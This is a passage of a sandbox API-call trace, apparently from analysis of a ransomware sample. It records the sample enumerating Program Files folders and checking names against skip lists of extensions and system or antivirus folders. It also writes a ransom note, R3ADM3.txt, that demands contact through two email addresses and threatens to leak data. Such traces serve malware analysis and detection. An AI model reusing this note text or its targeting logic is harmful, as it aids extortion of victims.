(HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792778 [0159.391] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.391] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.391] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.391] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636bfc00, ftCreationTime.dwHighDateTime=0x1cb7010, ftLastAccessTime.dwLowDateTime=0xd79ccfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x636bfc00, ftLastWriteTime.dwHighDateTime=0x1cb7010, nFileSizeHigh=0x0, nFileSizeLow=0x1b968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NAME.DLL", cAlternateFileName="")) returned 1 [0159.391] lstrcmpW (lpString1="NAME.DLL", lpString2=".") returned 1 [0159.391] lstrcmpW (lpString1="NAME.DLL", lpString2="..") returned 1 [0159.391] StrStrIW (lpFirst="NAME.DLL", lpSrch=".UAKXC") returned 0x0 [0159.391] StrStrIW (lpFirst="NAME.DLL", lpSrch=".exe") returned 0x0 [0159.391] StrStrIW (lpFirst="NAME.DLL", lpSrch=".dll") returned=".DLL" [0159.391] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a7a600, ftCreationTime.dwHighDateTime=0x1cab99a, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19a7a600, ftLastWriteTime.dwHighDateTime=0x1cab99a, nFileSizeHigh=0x0, nFileSizeLow=0x4780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NAMECONTROLPROXY.DLL", cAlternateFileName="NAMECO~1.DLL")) returned 1 [0159.391] lstrcmpW (lpString1="NAMECONTROLPROXY.DLL", lpString2=".") returned 1 [0159.391] lstrcmpW (lpString1="NAMECONTROLPROXY.DLL", lpString2="..") returned 1 [0159.391] StrStrIW (lpFirst="NAMECONTROLPROXY.DLL", lpSrch=".UAKXC") returned 0x0 [0159.391] StrStrIW (lpFirst="NAMECONTROLPROXY.DLL", lpSrch=".exe") returned 0x0 [0159.391] StrStrIW (lpFirst="NAMECONTROLPROXY.DLL", lpSrch=".dll") returned=".DLL" [0159.391] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a7a600, ftCreationTime.dwHighDateTime=0x1cab99a, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19a7a600, ftLastWriteTime.dwHighDateTime=0x1cab99a, nFileSizeHigh=0x0, nFileSizeLow=0x1ab80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NAMECONTROLSERVER.EXE", cAlternateFileName="NAMECO~1.EXE")) returned 1 [0159.392] lstrcmpW (lpString1="NAMECONTROLSERVER.EXE", lpString2=".") returned 1 [0159.392] lstrcmpW (lpString1="NAMECONTROLSERVER.EXE", lpString2="..") returned 1 [0159.392] StrStrIW (lpFirst="NAMECONTROLSERVER.EXE", lpSrch=".UAKXC") returned 0x0 [0159.392] StrStrIW (lpFirst="NAMECONTROLSERVER.EXE", lpSrch=".exe") returned=".EXE" [0159.392] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x948ed600, ftCreationTime.dwHighDateTime=0x1ca913a, ftLastAccessTime.dwLowDateTime=0xbdf30d20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x948ed600, ftLastWriteTime.dwHighDateTime=0x1ca913a, nFileSizeHigh=0x0, nFileSizeLow=0x26180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NAMEEXT.DLL", cAlternateFileName="")) returned 1 [0159.392] lstrcmpW (lpString1="NAMEEXT.DLL", lpString2=".") returned 1 [0159.392] lstrcmpW (lpString1="NAMEEXT.DLL", lpString2="..") returned 1 [0159.392] StrStrIW (lpFirst="NAMEEXT.DLL", lpSrch=".UAKXC") returned 0x0 [0159.392] StrStrIW (lpFirst="NAMEEXT.DLL", lpSrch=".exe") returned 0x0 [0159.392] StrStrIW (lpFirst="NAMEEXT.DLL", lpSrch=".dll") returned=".DLL" [0159.392] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b465500, ftCreationTime.dwHighDateTime=0x1cacf36, ftLastAccessTime.dwLowDateTime=0x6a4c77f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b465500, ftLastWriteTime.dwHighDateTime=0x1cacf36, nFileSizeHigh=0x0, nFileSizeLow=0x77cdb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NL7Data0011.DLL", cAlternateFileName="NL7DAT~1.DLL")) returned 1 [0159.392] lstrcmpW (lpString1="NL7Data0011.DLL", lpString2=".") returned 1 [0159.392] lstrcmpW (lpString1="NL7Data0011.DLL", lpString2="..") returned 1 [0159.392] StrStrIW (lpFirst="NL7Data0011.DLL", lpSrch=".UAKXC") returned 0x0 [0159.392] StrStrIW (lpFirst="NL7Data0011.DLL", lpSrch=".exe") returned 0x0 [0159.392] StrStrIW (lpFirst="NL7Data0011.DLL", lpSrch=".dll") returned=".DLL" [0159.392] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b465500, ftCreationTime.dwHighDateTime=0x1cacf36, ftLastAccessTime.dwLowDateTime=0x59590d50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b465500, ftLastWriteTime.dwHighDateTime=0x1cacf36, nFileSizeHigh=0x0, nFileSizeLow=0x258bb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NL7Lexicons0011.DLL", cAlternateFileName="NL7LEX~1.DLL")) returned 1 [0159.392] lstrcmpW (lpString1="NL7Lexicons0011.DLL", lpString2=".") returned 1 [0159.392] lstrcmpW (lpString1="NL7Lexicons0011.DLL", lpString2="..") returned 1 [0159.392] StrStrIW (lpFirst="NL7Lexicons0011.DLL", lpSrch=".UAKXC") returned 0x0 [0159.392] StrStrIW (lpFirst="NL7Lexicons0011.DLL", lpSrch=".exe") returned 0x0 [0159.392] StrStrIW (lpFirst="NL7Lexicons0011.DLL", lpSrch=".dll") returned=".DLL" [0159.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17736b00, ftCreationTime.dwHighDateTime=0x1cbae39, ftLastAccessTime.dwLowDateTime=0xa225ad60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x17736b00, ftLastWriteTime.dwHighDateTime=0x1cbae39, nFileSizeHigh=0x0, nFileSizeLow=0x589bb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NL7MODELS0009.dll", cAlternateFileName="NL7MOD~3.DLL")) returned 1 [0159.393] lstrcmpW (lpString1="NL7MODELS0009.dll", lpString2=".") returned 1 [0159.393] lstrcmpW (lpString1="NL7MODELS0009.dll", lpString2="..") returned 1 [0159.393] StrStrIW (lpFirst="NL7MODELS0009.dll", lpSrch=".UAKXC") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7MODELS0009.dll", lpSrch=".exe") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7MODELS0009.dll", lpSrch=".dll") returned=".dll" [0159.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a36d00, ftCreationTime.dwHighDateTime=0x1cba080, ftLastAccessTime.dwLowDateTime=0xa7323800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56a36d00, ftLastWriteTime.dwHighDateTime=0x1cba080, nFileSizeHigh=0x0, nFileSizeLow=0x5ef3b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NL7MODELS000A.dll", cAlternateFileName="NL7MOD~1.DLL")) returned 1 [0159.393] lstrcmpW (lpString1="NL7MODELS000A.dll", lpString2=".") returned 1 [0159.393] lstrcmpW (lpString1="NL7MODELS000A.dll", lpString2="..") returned 1 [0159.393] StrStrIW (lpFirst="NL7MODELS000A.dll", lpSrch=".UAKXC") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7MODELS000A.dll", lpSrch=".exe") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7MODELS000A.dll", lpSrch=".dll") returned=".dll" [0159.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c1cc400, ftCreationTime.dwHighDateTime=0x1cba07f, ftLastAccessTime.dwLowDateTime=0xa4b90a40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3c1cc400, ftLastWriteTime.dwHighDateTime=0x1cba07f, nFileSizeHigh=0x0, nFileSizeLow=0x5697b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NL7MODELS000C.dll", cAlternateFileName="NL7MOD~2.DLL")) returned 1 [0159.393] lstrcmpW (lpString1="NL7MODELS000C.dll", lpString2=".") returned 1 [0159.393] lstrcmpW (lpString1="NL7MODELS000C.dll", lpString2="..") returned 1 [0159.393] StrStrIW (lpFirst="NL7MODELS000C.dll", lpSrch=".UAKXC") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7MODELS000C.dll", lpSrch=".exe") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7MODELS000C.dll", lpSrch=".dll") returned=".dll" [0159.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b465500, ftCreationTime.dwHighDateTime=0x1cacf36, ftLastAccessTime.dwLowDateTime=0x6a513ab0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b465500, ftLastWriteTime.dwHighDateTime=0x1cacf36, nFileSizeHigh=0x0, nFileSizeLow=0x652bb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NL7Models0011.DLL", cAlternateFileName="NL7MOD~4.DLL")) returned 1 [0159.393] lstrcmpW (lpString1="NL7Models0011.DLL", lpString2=".") returned 1 [0159.393] lstrcmpW (lpString1="NL7Models0011.DLL", lpString2="..") returned 1 [0159.393] StrStrIW (lpFirst="NL7Models0011.DLL", lpSrch=".UAKXC") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7Models0011.DLL", lpSrch=".exe") returned 0x0 [0159.393] StrStrIW (lpFirst="NL7Models0011.DLL", lpSrch=".dll") returned=".DLL" [0159.393] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42d95200, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x59590d50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x42d95200, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NPAUTHZ.DLL", cAlternateFileName="")) returned 1 [0159.394] lstrcmpW (lpString1="NPAUTHZ.DLL", lpString2=".") returned 1 [0159.394] lstrcmpW (lpString1="NPAUTHZ.DLL", lpString2="..") returned 1 [0159.394] StrStrIW (lpFirst="NPAUTHZ.DLL", lpSrch=".UAKXC") returned 0x0 [0159.394] StrStrIW (lpFirst="NPAUTHZ.DLL", lpSrch=".exe") returned 0x0 [0159.394] StrStrIW (lpFirst="NPAUTHZ.DLL", lpSrch=".dll") returned=".DLL" [0159.394] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bc1b000, ftCreationTime.dwHighDateTime=0x1cbe56f, ftLastAccessTime.dwLowDateTime=0xe07baf60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1bc1b000, ftLastWriteTime.dwHighDateTime=0x1cbe56f, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OART.DLL", cAlternateFileName="")) returned 1 [0159.394] lstrcmpW (lpString1="OART.DLL", lpString2=".") returned 1 [0159.394] lstrcmpW (lpString1="OART.DLL", lpString2="..") returned 1 [0159.394] StrStrIW (lpFirst="OART.DLL", lpSrch=".UAKXC") returned 0x0 [0159.394] StrStrIW (lpFirst="OART.DLL", lpSrch=".exe") returned 0x0 [0159.468] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0159.468] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0159.469] CloseHandle (hObject=0x6dc) returned 1 [0159.470] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.470] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0159.470] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x63eab9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x63eab9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0159.470] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0159.470] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x63eab9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x63eab9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.470] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0159.470] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0159.470] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0159.470] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0159.470] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0159.470] StrStrIW (lpFirst="1033", lpSrch="tmp") returned 0x0 [0159.470] StrStrIW (lpFirst="1033", lpSrch="winnt") returned 0x0 [0159.470] StrStrIW (lpFirst="1033", lpSrch="temp") returned 0x0 [0159.471] StrStrIW (lpFirst="1033", lpSrch="thumb") returned 0x0 [0159.471] StrStrIW (lpFirst="1033", lpSrch="$Recycle.Bin") returned 0x0 [0159.471] StrStrIW (lpFirst="1033", lpSrch="$RECYCLE.BIN") returned 0x0 [0159.471] StrStrIW (lpFirst="1033", lpSrch="System Volume Information") returned 0x0 [0159.471] StrStrIW (lpFirst="1033", lpSrch="Boot") returned 0x0 [0159.471] StrStrIW (lpFirst="1033", lpSrch="Windows") returned 0x0 [0159.471] StrStrIW (lpFirst="1033", lpSrch="Trend Micro") returned 0x0 [0159.471] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0159.471] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.471] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.471] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.471] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0159.471] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ef0 [0159.471] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794610 [0159.471] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.471] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63eab9d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x63eab9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x63eab9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0159.471] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0159.471] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0159.471] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0159.471] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0159.471] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0159.471] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0159.471] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0159.471] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0159.471] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0159.471] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63eab9d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x63eab9d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x63eab9d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0159.472] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0159.472] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd88 | out: hHeap=0xea0000) returned 1 [0159.472] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0159.472] Sleep (dwMilliseconds=0x32) [0159.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0159.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede290 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede428 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede4b0 [0159.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede428 | out: hHeap=0xea0000) returned 1 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede428 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd88 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede538 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede5c0 [0159.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0159.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede5c0 | out: hHeap=0xea0000) returned 1 [0159.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede538 | out: hHeap=0xea0000) returned 1 [0159.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd88 | out: hHeap=0xea0000) returned 1 [0159.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0159.934] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0159.934] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0159.936] CloseHandle (hObject=0x6dc) returned 1 [0159.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0159.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede428 | out: hHeap=0xea0000) returned 1 [0159.936] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64322310, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64322310, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0159.936] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0159.936] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64322310, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64322310, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.936] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0159.936] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0159.936] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0159.936] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0159.936] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0159.936] StrStrIW (lpFirst="Desktop", lpSrch="tmp") returned 0x0 [0159.936] StrStrIW (lpFirst="Desktop", lpSrch="winnt") returned 0x0 [0159.936] StrStrIW (lpFirst="Desktop", lpSrch="temp") returned 0x0 [0159.936] StrStrIW (lpFirst="Desktop", lpSrch="thumb") returned 0x0 [0159.936] StrStrIW (lpFirst="Desktop", lpSrch="$Recycle.Bin") returned 0x0 [0159.936] StrStrIW (lpFirst="Desktop", lpSrch="$RECYCLE.BIN") returned 0x0 [0159.937] StrStrIW (lpFirst="Desktop", lpSrch="System Volume Information") returned 0x0 [0159.937] StrStrIW (lpFirst="Desktop", lpSrch="Boot") returned 0x0 [0159.937] StrStrIW (lpFirst="Desktop", lpSrch="Windows") returned 0x0 [0159.937] StrStrIW (lpFirst="Desktop", lpSrch="Trend Micro") returned 0x0 [0159.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede428 [0159.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede538 [0159.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0159.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede538 | out: hHeap=0xea0000) returned 1 [0159.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede428 | out: hHeap=0xea0000) returned 1 [0159.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2da8 [0159.937] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34b80 [0159.937] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0159.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64322310, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x64322310, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64322310, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0159.937] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0159.937] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0159.937] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0159.937] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0159.937] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0159.937] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0159.937] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0159.937] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0159.937] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0159.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, 